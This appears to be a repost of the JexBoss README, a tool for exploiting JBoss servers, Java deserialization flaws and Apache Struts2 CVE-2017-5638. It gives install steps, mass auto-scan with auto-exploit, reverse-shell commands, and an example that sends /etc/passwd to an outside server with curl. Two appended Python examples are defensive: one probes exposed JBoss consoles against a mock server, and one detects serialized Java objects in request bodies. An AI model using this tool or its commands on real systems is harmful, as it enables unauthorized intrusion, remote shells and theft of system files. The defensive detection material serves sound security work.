JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool

Description

JexBoss is a tool for testing and exploiting [vulnerabilities](https://www.kitploit.com/search/label/vulnerabilities) in JBoss Application Server and in other Java platforms, frameworks and applications.

**Requirements**

* Python >= 2.7.x
* [urllib3](https://pypi.python.org/pypi/urllib3)
* [ipaddress](https://pypi.python.org/pypi/ipaddress)

**Installation on Linux/Mac**

To install the latest version of JexBoss, run:

    git clone https://github.com/joaomatosf/jexboss.git
    cd jexboss
    pip install -r requires.txt
    python jexboss.py -h
    python jexboss.py -host http://target_host:8080

Or download the latest version at https://github.com/joaomatosf/jexboss/archive/master.zip and then:

    unzip master.zip
    cd jexboss-master
    pip install -r requires.txt
    python jexboss.py -h
    python jexboss.py -host http://target_host:8080

If you are using CentOS with Python 2.6, install Python 2.7 first. Example installation of Python 2.7 on CentOS using Software Collections (scl):

    yum -y install centos-release-scl
    yum -y install python27
    scl enable python27 bash

**Installation on Windows**

On Windows you can run JexBoss from [Git Bash](https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1). Follow the steps below:

* Download and install [Python](https://www.python.org/downloads/release/python-2712/)
* Download and install [Git for Windows](https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1)
* Open Git Bash and run:

      PATH=$PATH:C:\Python27\
      PATH=$PATH:C:\Python27\Scripts
      git clone https://github.com/joaomatosf/jexboss.git
      cd jexboss
      pip install -r requires.txt
      python jexboss.py -h
      python jexboss.py -host http://target_host:8080

**Features**

The tool and its [exploits](https://www.kitploit.com/search/label/Exploits) were developed and tested for:

* JBoss Application Server versions 3, 4, 5 and 6.
* Java deserialization vulnerabilities in multiple Java frameworks, platforms and applications (e.g. JavaServer Faces (JSF), Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), remote JMX (CVE-2016-3427, CVE-2016-8735), etc.).

The exploitation vectors are:

* /admin-console: tested and working on JBoss 5 and 6
* /jmx-console: tested and working on JBoss 4, 5 and 6
* /web-console/Invoker: tested and working on JBoss 4, 5 and 6
* /invoker/JMXInvokerServlet: tested and working on JBoss 4, 5 and 6
* Application deserialization: tested and working against multiple Java applications and platforms, via HTTP POST parameters
* Servlet deserialization: tested and working against multiple Java applications and platforms, via servlets that process serialized objects (e.g. when you see an "Invoker" in a link)
* Apache Struts 2, CVE-2017-5638: tested against [Apache Struts](https://www.kitploit.com/search/label/Apache%20Struts) 2 applications
* Others

**Videos**

* Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss
* Exploiting JBoss Application Server with JexBoss
* Exploiting Apache Struts2 (RCE) with JexBoss (CVE-2017-5638)

**Screenshots**

* Simple usage (help screen):

      $ python jexboss.py

  ![jexboss_4_simple_usage_help](https://2.bp.blogspot.com/-alewUh8TXc0/Wi9wFJdgWpI/AAAAAAAAJo4/87dRBMNedWgmHohXnwzK2I0FJgcN0zBpwCLcBGAs/s1600/jexboss_4_simple_usage_help.png)

* Standalone mode against JBoss:

      $ python jexboss.py -u http://192.168.0.26:8080

  ![jexboss_5_standalone_mode1](https://3.bp.blogspot.com/-fvaYj-MWERY/Wi9wOYLDowI/AAAAAAAAJpA/5tecs4RFkyouaO4sQ20qq5gIgeHoc_VrgCLcBGAs/s1600/jexboss_5_standalone_mode1.png)

  ![jexboss_6_standalone_mode2](https://4.bp.blogspot.com/-ERfHzmOvIpE/Wi9wOQNN7EI/AAAAAAAAJo8/sng_9BGOMLo7wSDXuCz-7XyIKxkgkl6VwCLcBGAs/s1600/jexboss_6_standalone_mode2.png)

* Usage modes:

      $ python jexboss.py -h

* Network scan mode:

      $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt

  ![jexboss_7_network_scan_mode](https://4.bp.blogspot.com/-Hlq5rVHgHfI/Wi9wU1Z_sdI/AAAAAAAAJpE/Ep3uvTm2nM4A_doi2mJttKnPP3aqxM56gCLcBGAs/s1600/jexboss_7_network_scan_mode.png)

* Network scan with auto-exploit mode:

      $ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt

  ![jexboss_8_scan_with_auto_exploit_mode](https://1.bp.blogspot.com/-OFuKod1ko5Q/Wi9wb07NaYI/AAAAAAAAJpI/DR6ESX-6VikK_zs7vDilROlUvaLzEykrACLcBGAs/s1600/jexboss_8_scan_with_auto_exploit_mode.png)

* Results and recommendations:

  ![jexboss_9_results_and_recommendations2](https://3.bp.blogspot.com/-a6A8GBdXzWw/Wi9wgd_s8gI/AAAAAAAAJpM/XarXTIL4-wUMpFJwIr-Q9wOYkil5w76vQCLcBGAs/s1600/jexboss_9_results_and_recommendations2.png)

**Reverse Shell (meterpreter integration)**

After exploiting a JBoss server you can either use JexBoss's own command shell or open a reverse connection with the command `jexremote=YOUR_IP:YOUR_PORT`. Example:

    Shell>jexremote=192.168.0.10:4444

[![jexboss_10_jexbossreverse2](https://4.bp.blogspot.com/-DTLzz6fknAc/Wi9wlav0sMI/AAAAAAAAJpQ/Au8e57VCaooIR0iX0fH3qqPHYZvsrDHoQCLcBGAs/s1600/jexboss_10_jexbossreverse2.jpeg)](https://github.com/joaomatosf/jexboss/raw/master/screenshots/jexbossreverse2.jpg)

When exploiting Java deserialization [vulnerabilities](https://www.kitploit.com/search/label/vulnerabilities) (application deserialization, servlet deserialization), the default actions are to open a reverse shell or to send a command to be executed.

**Usage examples**

* Java deserialization vulnerability in a custom HTTP parameter, sending a specific command to be executed on the exploited server:

      $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d @/etc/passwd http://your_server'

* Java deserialization vulnerability in a custom HTTP parameter, opening a reverse shell (JexBoss will ask for the IP address and port of your listener):

      $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name

* Java deserialization vulnerability in a servlet (like Invoker):

      $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize

* [Apache Struts](https://www.kitploit.com/search/label/Apache%20Struts) 2 (CVE-2017-5638):

      $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2

* [Apache Struts](https://www.kitploit.com/search/label/Apache%20Struts) 2 (CVE-2017-5638) with [cookies](https://www.kitploit.com/search/label/Cookies), for authenticated resources:

      $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"

* Auto-scan mode:

      $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log

* File-scan mode:

      $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log

**More options**

    optional arguments:
      -h, --help            show this help message and exit
      --version             show program's version number and exit
      --auto-exploit, -A    Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!)
      --disable-check-updates, -D
                            Disable the two update checks: 1) the check performed by the webshell
                            deployed on the exploited server against
                            http://webshell.jexboss.net/jsp_version.txt, and 2) the check performed
                            by the jexboss client against http://joaomatosf.com/rnp/releases.txt
      -mode {standalone,auto-scan,file-scan}
                            Operation mode (DEFAULT: standalone)
      --app-unserialize, -j
                            Check for Java unserialization vulnerabilities in HTTP parameters
                            (eg. javax.faces.ViewState, oldFormData, etc)
      --servlet-unserialize, -l
                            Check for Java unserialization vulnerabilities in servlets
                            (like Invoker interfaces)
      --jboss               Check only for JBoss vectors.
      --jenkins             Check only for the Jenkins CLI vector.
      --jmxtomcat           Check JMX JmxRemoteLifecycleListener in Tomcat
                            (CVE-2016-3427 and CVE-2016-8735). Note: not checked by default.
      --proxy PROXY, -P PROXY
                            Use an HTTP proxy to connect to the target URL (eg. -P http://192.168.0.1:3128)
      --proxy-cred LOGIN:PASS, -L LOGIN:PASS
                            Proxy authentication credentials (eg. -L name:password)
      --jboss-login LOGIN:PASS, -J LOGIN:PASS
                            JBoss login and password for exploiting admin-console on JBoss 5 and
                            JBoss 6 (default: admin:admin)
      --timeout TIMEOUT     Seconds to wait before the connection times out (default 3)

    Standalone mode:
      -host HOST, -u HOST   Host address to be checked (eg. -u http://192.168.0.10:8080)

    Advanced options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN THE APP LAYER):
      --reverse-host RHOST:RPORT, -r RHOST:RPORT
                            Remote host address and port for the reverse shell when exploiting
                            Java deserialization vulnerabilities in the application layer
                            (for now, working only against *nix systems) (eg. 192.168.0.10:1331)
      --cmd CMD, -x CMD     Send a specific command to run on the target
                            (eg. curl -d @/etc/passwd http://your_server)
      --windows, -w         Specifies that the commands are for Windows systems (cmd.exe)
      --post-parameter PARAMETER, -H PARAMETER
                            Specify the parameter to find and inject serialized objects into
                            (eg. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others)
                            (DEFAULT: javax.faces.ViewState)
      --show-payload, -t    Print the generated payload.
      --gadget {commons-collections3.1,commons-collections4.0,groovy1}
                            Specify the type of gadget to generate the payload automatically
                            (DEFAULT: commons-collections3.1, or groovy1 for Jenkins)
      --load-gadget FILENAME
                            Provide your own gadget from a file (a Java serialized object in raw form)
      --force, -F           Force sending Java serialized gadgets to the URL given in the -u
                            parameter. The payload is sent in multiple formats (eg. RAW, GZIPPED
                            and BASE64) and with different Content-Types.

    Auto-scan mode:
      -network NETWORK      Network to be checked, in CIDR format (eg. 10.0.0.0/8)
      -ports PORTS          Comma-separated list of ports to be checked on each host
                            (eg. 8080,8443,8888,80,443)
      -results FILENAME     File name to store the auto-scan results

    File-scan mode:
      -file FILENAME_HOSTS  File with the host list to be scanned (one host per line)
      -out FILENAME_RESULTS
                            File name to store the file-scan results

**[Download JexBoss](https://github.com/joaomatosf/jexboss)**
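The four JBoss URL vectors listed under Features (/admin-console, /jmx-console, /web-console/Invoker, /invoker/JMXInvokerServlet) are what the standalone and auto-scan modes probe before any exploit is sent. The following is an added example (Python 3), not JexBoss's own code: a non-destructive pre-check that only issues GET requests and reports which of those paths answer, so a tester can confirm exposure (or a defender can confirm remediation) without deploying anything. The mock target it talks to is constructed for the example and its status codes are assumptions; point `check_jboss_vectors` at a host you are authorised to test instead.

```python
"""Non-destructive exposure check for the JBoss vectors JexBoss probes.

Added example, not part of JexBoss. It never sends a payload; it only
records the HTTP status each vector path returns.
"""
import http.server
import socketserver
import threading
import urllib.error
import urllib.request

# The vectors the README lists, with the JBoss versions it says they apply to.
JBOSS_VECTORS = {
    "/admin-console": "JBoss 5, 6",
    "/jmx-console": "JBoss 4, 5, 6",
    "/web-console/Invoker": "JBoss 4, 5, 6",
    "/invoker/JMXInvokerServlet": "JBoss 4, 5, 6",
}


def probe(base_url, path, timeout=3):
    """Return the HTTP status for base_url+path, or None if unreachable."""
    req = urllib.request.Request(base_url.rstrip("/") + path, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code          # 401/403/404 are still informative
    except (urllib.error.URLError, OSError):
        return None            # refused, DNS failure, timeout


def check_jboss_vectors(base_url, timeout=3):
    """Map each vector path to (status, note).

    2xx  -> the console/invoker answers without credentials ("exposed")
    401/403 -> present but guarded (still worth reporting: default creds)
    other -> not found; None -> host unreachable
    """
    results = {}
    for path, versions in JBOSS_VECTORS.items():
        status = probe(base_url, path, timeout)
        if status is None:
            note = "unreachable"
        elif 200 <= status < 300:
            note = "exposed (%s)" % versions
        elif status in (401, 403):
            note = "present, authentication required"
        else:
            note = "not found"
        results[path] = (status, note)
    return results


# --- constructed mock of a JBoss-like server, for the example only --------
class _MockJBoss(http.server.BaseHTTPRequestHandler):
    # Assumed layout: open JMX/web consoles, admin-console behind auth.
    ROUTES = {"/jmx-console": 200, "/web-console/Invoker": 200,
              "/admin-console": 401}

    def do_GET(self):
        self.send_response(self.ROUTES.get(self.path, 404))
        self.end_headers()

    def log_message(self, *args):  # keep the example quiet
        pass


def start_mock_server():
    """Start the mock on an ephemeral loopback port; returns (base_url, server)."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), _MockJBoss)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d" % srv.server_address[1], srv


if __name__ == "__main__":
    url, srv = start_mock_server()
    for path, (status, note) in check_jboss_vectors(url).items():
        print("%-28s %-4s %s" % (path, status, note))
    srv.shutdown()
    srv.server_close()
```

A 401 on /admin-console is reported separately rather than as "not found" because the README's `--jboss-login` option defaults to admin:admin; a guarded console with default credentials is still a finding.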
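The `--force` option above says the gadget is sent "in multiple formats (eg. RAW, GZIPED and BASE64) and with different Content-Types", and `-H` defaults to the javax.faces.ViewState parameter. The practical consequence for a defender is that a signature on the raw serialized stream alone misses the wrapped forms. The following is an added example (Python 3), not JexBoss code: `encode_variants` reproduces those wrappings for a constructed stand-in blob (plus a base64-of-gzip layer, added here to show nesting), and `contains_java_object` unwraps a request body and checks for the Java serialization stream header bytes AC ED 00 05 (STREAM_MAGIC and STREAM_VERSION), which is the value a WAF rule or log-review script should key on. The stand-in blob, the Content-Type strings and the nesting depth are assumptions made for the example.

```python
"""Detecting serialized Java objects in the wrappings JexBoss --force uses.

Added example, not part of JexBoss. The blob below is a constructed
stand-in with a valid stream header and filler; it is not a working gadget.
"""
import base64
import binascii
import gzip
import zlib

# Java serialization stream header: STREAM_MAGIC 0xACED, STREAM_VERSION 5.
JAVA_STREAM_HEADER = b"\xac\xed\x00\x05"

# Constructed stand-in for a serialized gadget chain (header + filler).
FAKE_GADGET = JAVA_STREAM_HEADER + b"sr\x00\x11constructed.Filler" + b"\x00" * 16


def encode_variants(blob):
    """Return (label, content_type, body) tuples for the delivery formats the
    README names (raw, gzip, base64) plus base64-of-gzip to show nesting.
    The Content-Type values are assumptions for the example."""
    gz = gzip.compress(blob)
    return [
        ("raw", "application/x-java-serialized-object", blob),
        ("gzip", "application/x-java-serialized-object", gz),
        ("base64", "application/x-www-form-urlencoded", base64.b64encode(blob)),
        ("base64+gzip", "application/x-www-form-urlencoded", base64.b64encode(gz)),
    ]


def _try_gunzip(data):
    """gunzip if data carries the gzip magic, else None."""
    if data[:2] != b"\x1f\x8b":
        return None
    try:
        return gzip.decompress(data)
    except (OSError, EOFError, zlib.error):
        return None


def _try_b64(data):
    """Strict base64 decode (alphabet and padding enforced), else None."""
    try:
        return base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None


def contains_java_object(body, max_depth=3):
    """True if body is, or unwraps (gzip/base64, nested up to max_depth
    layers) to, a Java serialization stream."""
    layer = [body]
    for depth in range(max_depth + 1):
        for d in layer:
            if d[:4] == JAVA_STREAM_HEADER:
                return True
        if depth == max_depth:
            break
        nxt = []
        for d in layer:
            for dec in (_try_gunzip(d), _try_b64(d)):
                if dec and dec not in nxt:
                    nxt.append(dec)
        if not nxt:
            return False
        layer = nxt
    return False


if __name__ == "__main__":
    for label, ctype, body in encode_variants(FAKE_GADGET):
        print("%-12s %-38s detected=%s" % (label, ctype, contains_java_object(body)))
    print("benign base64 detected=%s" % contains_java_object(b"aGVsbG8gd29ybGQ="))
```

The decoder is deliberately strict (`validate=True`) so that ordinary form text is not mis-decoded as base64; a body that is URL-encoded or split into form fields must be decoded to the parameter value first, which is outside this example.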

